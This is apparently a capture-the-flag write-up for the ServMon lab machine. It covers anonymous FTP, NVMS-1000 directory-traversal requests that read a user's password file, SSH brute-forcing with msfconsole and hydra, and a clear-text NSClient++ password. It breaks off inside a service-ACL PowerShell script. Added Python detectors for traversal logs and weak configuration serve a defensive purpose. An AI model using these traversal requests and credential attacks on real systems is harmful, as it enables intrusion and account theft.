
ServMon_HTB

Published 2023/12/26


Overview

  • ServMon is an easy Windows machine with an HTTP server hosting an NVMS-1000 (network monitoring management software) instance, which turns out to be vulnerable to LFI.
  • The LFI is used to read a list of passwords left on a user's Desktop. With those credentials we can connect to the server over SSH as a second user.
  • As this low-privileged user we can enumerate the system and find the password for NSClient++ (a system monitoring agent).
  • After creating an SSH tunnel we can reach the NSClient++ web app, which includes a feature for defining scripts that run in the context of NT AUTHORITY\SYSTEM.
  • The user has been granted the right to restart the NSCP service, so once a malicious script is defined and the service is restarted, commands run as SYSTEM.

SCAN

┌──(kali㉿kali)-[~]
└─$ nmap -p1-10000 -sC -sV -Pn 10.10.10.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-25 23:07 EST
Nmap scan report for 10.10.10.184
Host is up (0.61s latency).
Not shown: 9990 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c71af681ca1778d027dbcd462a092b54 (RSA)
|   256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_  256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6063/tcp open  x11?
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     Sat:Saturday
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=12/25%Time=658A53EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/h
SF:tml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(R
SF:TSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\
SF:nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\
SF:n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201
SF:\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1
SF:-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/
SF:xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x
SF:20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20
SF:\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.93%T=SSL%I=7%D=12/25%Time=658A53F6%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x1
SF:2\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xdaL\x12")%
SF:r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu
SF:ment\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCont
SF:ent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nD
SF:ocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-26T04:20:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 820.57 seconds
  • nmap assessment
    • Anonymous FTP login is enabled, so first try logging in over FTP.

FTP login

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50426|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50427|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd 
ftp> anonymous
?Invalid command.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50428|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||50429|)
125 Data connection already open; Transfer starting.
100% |**************************|   168        0.47 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.29 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||50431|)
125 Data connection already open; Transfer starting.
100% |**************************|   182        0.49 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.30 KiB/s)
  • Check the retrieved files
┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine  
┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
  • Assessment
    • Notes to do.txt contains information about completed and outstanding tasks for the installed monitoring apps.

web access

  • Access the site normally.
  • Assessment
    • Cannot log in with the default password
    • Reference: https://www.akakagemaru.info/port/webcam-wifichange.html
  • Access port 8443
  • Assessment
    • Nothing is displayed, so consider another approach

Use Burp to check for the LFI vulnerability.

Checking NVMS for known vulnerabilities

┌──(kali㉿kali)-[~]
└─$ searchsploit nvms
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal      | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack B | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal  | hardware/webapps/48311.py
------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 47774  
  Exploit: NVMS 1000 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/47774
     Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/47774.txt                           
┌──(kali㉿kali)-[~]
└─$ cat 47774.txt        
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Burp settings

  • Configure the Proxy to intercept responses as well.
    • Check them in the same way as requests

Trying the vulnerability

  • Try the same request as in the txt.
    GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

  • The win.ini file exists on every Windows installation and is readable by all users, so it is a good target for verifying LFI.
  • Since there was information that the file is on the Desktop, perform directory traversal.
    GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
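As an added example, not part of the original write-up: a small Python detector, run over constructed web-server log lines, that shows how requests like the two above look to a defender reviewing NVMS-1000 access logs. It decodes up to two layers of percent-encoding, treats backslashes as path separators, counts how many `..` segments step above the web root, and keeps the HTTP status so that successful reads (200) stand out from mere attempts. The log format, timestamps and client address are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); the paths mirror the
# requests discussed above, the client IP and timestamps are made up.
TRAVERSAL = "../" * 12  # twelve steps up, like the request on the page
SAMPLE_LOG = f"""\
10.10.16.2 - - [26/Dec/2023:04:20:01 +0000] "GET /Pages/login.htm HTTP/1.1" 200 340
10.10.16.2 - - [26/Dec/2023:04:20:05 +0000] "GET /{TRAVERSAL}windows/win.ini HTTP/1.1" 200 92
10.10.16.2 - - [26/Dec/2023:04:20:09 +0000] "GET /..%2f..%2f..%2fUsers/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.10.16.2 - - [26/Dec/2023:04:20:12 +0000] "GET /%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 404 18
10.10.16.2 - - [26/Dec/2023:04:20:15 +0000] "GET /images/logo.png?v=1..2 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def normalise_path(raw_path):
    """Return (decoded path, number of '..' segments that escape the web root).

    Decodes up to two layers of percent-encoding (catches %2f and %252e),
    unifies backslashes, and walks the segments keeping a depth counter so
    that '/a/../b' (which stays inside the root) is not reported.
    """
    path = raw_path.split('?', 1)[0]          # query string cannot change the file
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace('\\', '/')
    depth = 0
    escapes = 0
    for seg in path.split('/'):
        if seg == '..':
            if depth == 0:
                escapes += 1                  # stepping above the web root
            else:
                depth -= 1
        elif seg not in ('', '.'):
            depth += 1
    return path, escapes


def find_traversal(log_text):
    """Return one finding per request whose normalised path escapes the root."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        norm, escapes = normalise_path(m.group('path'))
        if escapes > 0:
            findings.append({
                'ip': m.group('ip'),
                'status': int(m.group('status')),
                'escapes': escapes,
                'path': norm,
            })
    return findings


if __name__ == '__main__':
    for f in find_traversal(SAMPLE_LOG):
        flag = 'READ OK' if f['status'] == 200 else 'attempt'
        print(f"{f['ip']} {flag} escapes={f['escapes']} {f['path']}")
```

Three of the five constructed lines are reported; the query-string `..` in the last line is correctly ignored. A 200 on a traversal path is the signal worth alerting on, since it means the server actually served a file outside its root.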

SSH attempt

When using msfconsole

  • Attempt logins using the passwords obtained via Burp above, the usernames obtained so far, and common names.
┌──(kali㉿kali)-[~/ServMon]
└─$ cat passwords.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
                                                                       
┌──(kali㉿kali)-[~/ServMon]
└─$ cat users.txt    
Nadine
nadine
Nathan
nathan
admin
Admin
Administrator
administrator
  • Access attempt with msfconsole
┌──(kali㉿kali)-[~/ServMon]
└─$ msfconsole -q

msf6 > 
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE passwords.txt 
USERPASS_FILE => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BLANK_PASSWORDS  false            no        Try blank passwords fo
                                               r all users
   BRUTEFORCE_SPEE  5                yes       How fast to bruteforce
   D                                           , from 0 to 5
   DB_ALL_CREDS     false            no        Try each user/password
                                                couple stored in the
                                               current database
   DB_ALL_PASS      false            no        Add all passwords in t
                                               he current database to
                                                the list
   DB_ALL_USERS     false            no        Add all users in the c
                                               urrent database to the
                                                list
   DB_SKIP_EXISTIN  none             no        Skip existing credenti
   G                                           als stored in the curr
                                               ent database (Accepted
                                               : none, user, user&rea
                                               lm)
   PASSWORD                          no        A specific password to
                                                authenticate with
   PASS_FILE        passwords.txt    no        File containing passwo
                                               rds, one per line
   RHOSTS           10.10.10.184     yes       The target host(s), se
                                               e https://docs.metaspl
                                               oit.com/docs/using-met
                                               asploit/basics/using-m
                                               etasploit.html
   RPORT            22               yes       The target port
   STOP_ON_SUCCESS  false            yes       Stop guessing when a c
                                               redential works for a
                                               host
   THREADS          1                yes       The number of concurre
                                               nt threads (max one pe
                                               r host)
   USERNAME                          no        A specific username to
                                                authenticate as
   USERPASS_FILE    passwords.txt    no        File containing users
                                               and passwords separate
                                               d by space, one pair p
                                               er line
   USER_AS_PASS     false            no        Try the username as th
                                               e password for all use
                                               rs
   USER_FILE        users.txt        no        File containing userna
                                               mes, one per line
   VERBOSE          false            yes       Whether to print outpu
                                               t for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 10.10.10.184:22 - Starting bruteforce
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 1 opened (10.10.16.2:35313 -> 10.10.10.184:22) at 2023-12-26 02:55:42 -0500
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 2 opened (10.10.16.2:34081 -> 10.10.10.184:22) at 2023-12-26 02:56:08 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > showsessions
[-] Unknown command: showsessions
msf6 auxiliary(scanner/ssh/ssh_login) > show sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell windows  SSH kali @   10.10.16.2:35313 -> 10.10.10.
                                        184:22 (10.10.10.184)
  2         shell windows  SSH kali @   10.10.16.2:34081 -> 10.10.10.
                                        184:22 (10.10.10.184)

When using hydra

┌──(kali㉿kali)-[~/ServMon]
└─$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-26 05:33:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 56 login tries (l:8/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: nadine   password: L1k3B1gBut7s@W0rk                                                                    
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk                                                                    
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-26 05:33:55

┌──(kali㉿kali)-[~/ServMon]
└─$ ssh nadine@10.10.10.184     
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
nadine@10.10.10.184's password: 
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State     
============================= ============================== =======   
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled   

nadine@SERVMON C:\Users\Nadine>

Privilege Escalation

Investigating directories

  • On entering Program Files, we found another interesting directory named NSClient, which is mentioned in the Notes file found during the FTP login.
  • Next, let's look inside the NSClient directory.
PS C:\Program Files\NSClient++> gc nsclient.ini
# If you want to fill this file with all available options run the foll
owing command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:   
#   nscp settings --activate-module <MODULE NAME> --add-defaults       
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO 
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjuncti
on with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts       
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. 
Enter any command line here and they will be expanded by scripts placed
 under the wrapped scripts section. %SCRIPT% will be replaced by the ac
tual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts      
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %A
RGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (po
wershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Hos
t "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT
% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -   


; External scripts - A list of scripts available to run from the CheckE
xternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts 
module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
  • Command notes
    • gc command: the Get-Content cmdlet, which outputs the contents of a text file
    • .ini file: the INI file is one of the file formats used to record software settings and the like.
      • It is a text file with a simple structure, commonly used as a configuration file format
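As an added example (not part of the original write-up and not NSClient++ code), a Python audit of the settings that matter in the nsclient.ini above: the clear-text password, the loopback-only `allowed hosts`, and `CheckExternalScripts` combined with `allow arguments = true`. The sample INI is a constructed, shortened copy of the keys shown above with a placeholder password; a hardened variant is derived from it to show the findings that disappear when the two risky settings are turned off.

```python
import configparser

# Constructed sample modelled on the nsclient.ini keys shown above; the
# password value is a placeholder, not the one from the target.
WEAK_INI = """\
[/settings/default]
password = EXAMPLE-PLAINTEXT-PASSWORD
allowed hosts = 127.0.0.1

[/settings/NRPE/server]
ssl options = no-sslv2,no-sslv3
verify mode = peer-cert
insecure = false

[/modules]
WEBServer = enabled
NRPEServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/external scripts]
allow arguments = true
"""

# Same file with the two settings that turn the web UI into a SYSTEM shell
# switched off (the realistic fix if external scripts are not needed).
HARDENED_INI = (WEAK_INI
                .replace("CheckExternalScripts = enabled", "CheckExternalScripts = disabled")
                .replace("allow arguments = true", "allow arguments = false"))


def load_nsclient_ini(text):
    """nsclient.ini uses '#'/';' comments, keys containing spaces and %VAR%
    tokens in wrapper commands, so configparser interpolation must be off."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def _section(cp, name):
    return cp[name] if cp.has_section(name) else {}


def audit_nsclient(text):
    """Return a list of (severity, message) findings for an nsclient.ini."""
    cp = load_nsclient_ini(text)
    default = _section(cp, '/settings/default')
    modules = _section(cp, '/modules')
    ext = _section(cp, '/settings/external scripts')
    nrpe = _section(cp, '/settings/NRPE/server')
    findings = []

    if default.get('password'):
        findings.append(('HIGH', 'web/NRPE password stored in clear text in nsclient.ini; '
                                 'any local account that can read the file obtains it, '
                                 'so restrict the file ACL to administrators'))

    hosts = [h.strip() for h in default.get('allowed hosts', '').split(',') if h.strip()]
    if hosts and all(h in ('127.0.0.1', '::1', 'localhost') for h in hosts):
        findings.append(('INFO', 'allowed hosts is loopback-only: remote clients are blocked, '
                                 'but a local user can still reach the listeners, e.g. through '
                                 'an SSH port forward'))

    if modules.get('CheckExternalScripts', '').lower() == 'enabled':
        if ext.get('allow arguments', 'false').lower() == 'true':
            findings.append(('CRITICAL', 'CheckExternalScripts enabled with allow arguments = true: '
                                         'anyone holding the password can define and run commands '
                                         'under the service account (SYSTEM on this host)'))
        else:
            findings.append(('MEDIUM', 'CheckExternalScripts enabled: script definitions run '
                                       'under the service account'))

    if nrpe.get('insecure', 'false').lower() == 'true':
        findings.append(('HIGH', 'NRPE server runs in legacy insecure mode'))
    return findings


if __name__ == '__main__':
    for label, ini in (('weak', WEAK_INI), ('hardened', HARDENED_INI)):
        print(f'== {label} ==')
        for sev, msg in audit_nsclient(ini):
            print(f'[{sev}] {msg}')
```

The clear-text password finding survives hardening because NSClient++ keeps the password in this file; the control there is the file ACL, which is exactly what let the low-privileged user read it above.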

Checking the nscp.exe version

  • Exploit DB has vulnerability information for nscp
PS C:\Program Files\NSClient++> cmd /c "C:\Program Files\NSClient++\nsc
p.exe" --version                                                       
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
  • NSClient runs in the context of NT AUTHORITY\SYSTEM.
    • The precondition for this exploit to work is a service restart.
    • Rohn Edwards shows how to obtain service permissions with PowerShell.
      • The script can be downloaded into memory and executed using the Msxml2.XMLHTTP COM object download cradle.
      • However, access to the Service Control Manager is denied, so restart rights on the service have to be assumed.
  • Get-ServiceACL.ps1
┌──(kali㉿kali)-[~/ServMon]
└─$ cat Get-ServiceACL.ps1 
Add-Type  @"
  [System.FlagsAttribute]
  public enum ServiceAccessFlags : uint
  {
      QueryConfig = 1,
      ChangeConfig = 2,
      QueryStatus = 4,
      EnumerateDependents = 8,
      Start = 16,
      Stop = 32,
      PauseContinue = 64,
      Interrogate = 128,
      UserDefinedControl = 256,
      Delete = 65536,
      ReadControl = 131072,
      WriteDac = 262144,
      WriteOwner = 524288,
      Synchronize = 1048576,
      AccessSystemSecurity = 16777216,
      GenericAll = 268435456,
      GenericExecute = 536870912,
      GenericWrite = 1073741824,
      GenericRead = 2147483648
  }
"@
 
function Get-ServiceAcl {
    [CmdletBinding(DefaultParameterSetName="ByName")]
    param(
        [Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, ParameterSetName="ByName")]
        [string[]] $Name,
        [Parameter(Mandatory=$true, Position=0, ParameterSetName="ByDisplayName")]
        [string[]] $DisplayName,
        [Parameter(Mandatory=$false, Position=1)]
        [string] $ComputerName = $env:COMPUTERNAME
    )
 
    # If display name was provided, get the actual service name:
    switch ($PSCmdlet.ParameterSetName) {
        "ByDisplayName" {
            $Name = Get-Service -DisplayName $DisplayName -ComputerName $ComputerName -ErrorAction Stop | 
                Select-Object -ExpandProperty Name
        }
    }
 
    # Make sure computer has 'sc.exe':
    $ServiceControlCmd = Get-Command "$env:SystemRoot\system32\sc.exe"
    if (-not $ServiceControlCmd) {
        throw "Could not find $env:SystemRoot\system32\sc.exe command!"
    }
 
    # Get-Service does the work looking up the service the user requested:
    Get-Service -Name $Name | ForEach-Object {
         
        # We might need this info in catch block, so store it to a variable
        $CurrentName = $_.Name
 
        # Get SDDL using sc.exe
        $Sddl = & $ServiceControlCmd.Definition "\\$ComputerName" sdshow "$CurrentName" | Where-Object { $_ }
 
        try {
            # Get the DACL from the SDDL string
            $Dacl = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
        }
        catch {
            Write-Warning "Couldn't get security descriptor for service '$CurrentName': $Sddl"
            return
        }
 
        # Create the custom object with the note properties
        $CustomObject = New-Object -TypeName PSObject -Property ([ordered] @{ Name = $_.Name
                                                                              Dacl = $Dacl
                                                                            })
 
        # Add the 'Access' property: one object per ACE, with the access mask
        # decoded through the ServiceAccessFlags enum defined above
        $CustomObject | Add-Member -MemberType ScriptProperty -Name Access -Value {
            $this.Dacl.DiscretionaryAcl | ForEach-Object {
                $CurrentDacl = $_
 
                try {
                    $IdentityReference = $CurrentDacl.SecurityIdentifier.Translate([System.Security.Principal.NTAccount])
                }
                catch {
                    # Fall back to the raw SID if it cannot be translated to a name
                    $IdentityReference = $CurrentDacl.SecurityIdentifier.Value
                }
                 
                New-Object -TypeName PSObject -Property ([ordered] @{ 
                                ServiceRights = [ServiceAccessFlags] $CurrentDacl.AccessMask
                                AccessControlType = $CurrentDacl.AceType
                                IdentityReference = $IdentityReference
                                IsInherited = $CurrentDacl.IsInherited
                                InheritanceFlags = $CurrentDacl.InheritanceFlags
                                PropagationFlags = $CurrentDacl.PropagationFlags
                })
            }
        }
 
        # Add 'AccessToString' property that mimics a property of same name from normal Get-Acl call
